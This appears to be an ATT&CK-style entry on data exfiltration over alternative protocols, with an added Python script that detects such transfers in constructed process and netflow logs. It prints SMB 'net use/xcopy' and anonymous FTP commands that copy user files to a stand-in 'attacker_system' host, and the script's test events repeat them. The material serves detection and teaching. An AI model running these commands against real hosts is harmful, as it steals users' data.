
Exfiltration Over Alternative Protocol

Description

Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.

Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol.

SMB command-line example:

  • <code>net use \\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\* \\attacker_system\share_folder\</code>

Anonymous FTP command-line example (Citation: Palo Alto OilRig Oct 2016):

  • <code>echo PUT C:\Path\to\file.txt | ftp -A attacker_system</code>
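Both command lines above leave traces in the data sources listed for this technique: the utility invocations show up in process monitoring, and the bulk transfer shows up in netflow on a port other than the host's usual outbound channel. The following is an added example, not part of the ATT&CK entry or of any product, that runs two such checks over constructed process-creation and netflow records. The internal hostname suffix, the private address ranges, the 50 MB threshold, the set of "alternative" ports and every log record are assumptions made for the example.

```python
"""Added detection example for T1048 (not from the ATT&CK page itself).

Two checks built from the data sources listed for this technique:
  1. Process monitoring: net.exe / xcopy.exe / robocopy.exe command lines with a
     UNC path, or ftp.exe with a target host, where the remote host is outside the
     enterprise's own address space or hostname suffix.
  2. Netflow: per source host, take the port carrying the most outbound sessions as
     the assumed main channel and flag bulk transfers on any *other* port in the
     alternative-protocol set to an external destination.
All records and thresholds below are constructed for the example.
"""
import ipaddress
import re
from collections import Counter, defaultdict

# Assumed internal hostname suffix and private ranges (assumptions, not from the page).
INTERNAL_SUFFIX = ".corp.example"
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed threshold for "bulk" and the ports the page names as alternative protocols.
BULK_BYTES = 50_000_000
ALT_PORTS = {20, 21, 25, 53, 445}  # FTP data/control, SMTP, DNS, SMB

# Host component of a UNC path: \\host\share
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")


def is_internal(host: str) -> bool:
    """True for RFC 1918 addresses or hostnames under the internal suffix.
    Bare short names that cannot be resolved here are treated as external (conservative)."""
    try:
        return any(ipaddress.ip_address(host) in net for net in PRIVATE_NETS)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIX)


def suspicious_processes(events):
    """Return (host, image, remote) for utility invocations that reach a non-internal host."""
    hits = []
    for ev in events:
        img, cmd = ev["image"].lower(), ev["cmdline"]
        remote = None
        if img in ("net.exe", "xcopy.exe", "robocopy.exe"):
            m = UNC_RE.search(cmd)
            if m:
                remote = m.group(1)
        elif img == "ftp.exe":
            # ftp.exe takes the target host as its last positional argument (-A = anonymous login)
            tokens = cmd.split()
            if len(tokens) > 1 and not tokens[-1].startswith("-"):
                remote = tokens[-1]
        if remote and not is_internal(remote):
            hits.append((ev["host"], ev["image"], remote))
    return hits


def alternative_protocol_transfers(flows, threshold=BULK_BYTES):
    """Return (src, dst, dport, total_bytes) for bulk transfers on an alternative port
    that is not the source host's most-used outbound port, to an external destination."""
    sessions = defaultdict(Counter)   # src -> Counter of dport by session count
    volume = Counter()                # (src, dst, dport) -> total bytes
    for f in flows:
        sessions[f["src"]][f["dport"]] += 1
        volume[(f["src"], f["dst"], f["dport"])] += f["bytes"]
    hits = []
    for (src, dst, dport), total in volume.items():
        main_port = sessions[src].most_common(1)[0][0]
        if dport != main_port and dport in ALT_PORTS and total >= threshold and not is_internal(dst):
            hits.append((src, dst, dport, total))
    return sorted(hits)


# Constructed process-creation events (TEST-NET addresses stand in for attacker hosts).
PROCESS_EVENTS = [
    {"host": "WS01", "image": "net.exe",
     "cmdline": r"net use \\203.0.113.10\IPC$ /user:backup Passw0rd"},
    {"host": "WS01", "image": "xcopy.exe",
     "cmdline": r"xcopy /S /H /C /Y C:\Users\* \\203.0.113.10\share_folder"},
    {"host": "WS02", "image": "xcopy.exe",
     "cmdline": r"xcopy /S C:\Reports \\fileserver.corp.example\reports"},
    {"host": "WS03", "image": "ftp.exe", "cmdline": "ftp -A 198.51.100.7"},
]

# Constructed netflow: WS01 beacons on 443 then pushes 850 MB over SMB to the same host;
# WS03 uses a little HTTPS then uploads 60 MB over FTP; WS02 copies to an internal server.
NETFLOW = (
    [{"src": "10.0.0.11", "dst": "203.0.113.10", "dport": 443, "bytes": 1200}] * 20
    + [{"src": "10.0.0.11", "dst": "203.0.113.10", "dport": 445, "bytes": 850_000_000}]
    + [{"src": "10.0.0.13", "dst": "203.0.113.10", "dport": 443, "bytes": 900}] * 5
    + [{"src": "10.0.0.13", "dst": "198.51.100.7", "dport": 21, "bytes": 2_000},
       {"src": "10.0.0.13", "dst": "198.51.100.7", "dport": 20, "bytes": 60_000_000},
       {"src": "10.0.0.12", "dst": "10.0.0.50", "dport": 445, "bytes": 500_000_000}]
)

if __name__ == "__main__":
    for hit in suspicious_processes(PROCESS_EVENTS):
        print("process:", hit)
    for hit in alternative_protocol_transfers(NETFLOW):
        print("netflow:", hit)
```

The netflow check keys on the port carrying the most sessions rather than the most bytes, because a beaconing C2 channel is many small sessions while the exfiltration is a few large ones; an internal SMB copy to a file server does not fire because the destination is inside the private ranges. Passive-mode FTP uses ephemeral data ports, so in practice the port set would be replaced by protocol identification from packet capture.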

id

T1048

tactic

exfiltration

datasources

Process monitoring
Network protocol analysis
Netflow/Enclave netflow
Process use of network
Packet capture
User interface

maturity

Not Tracked
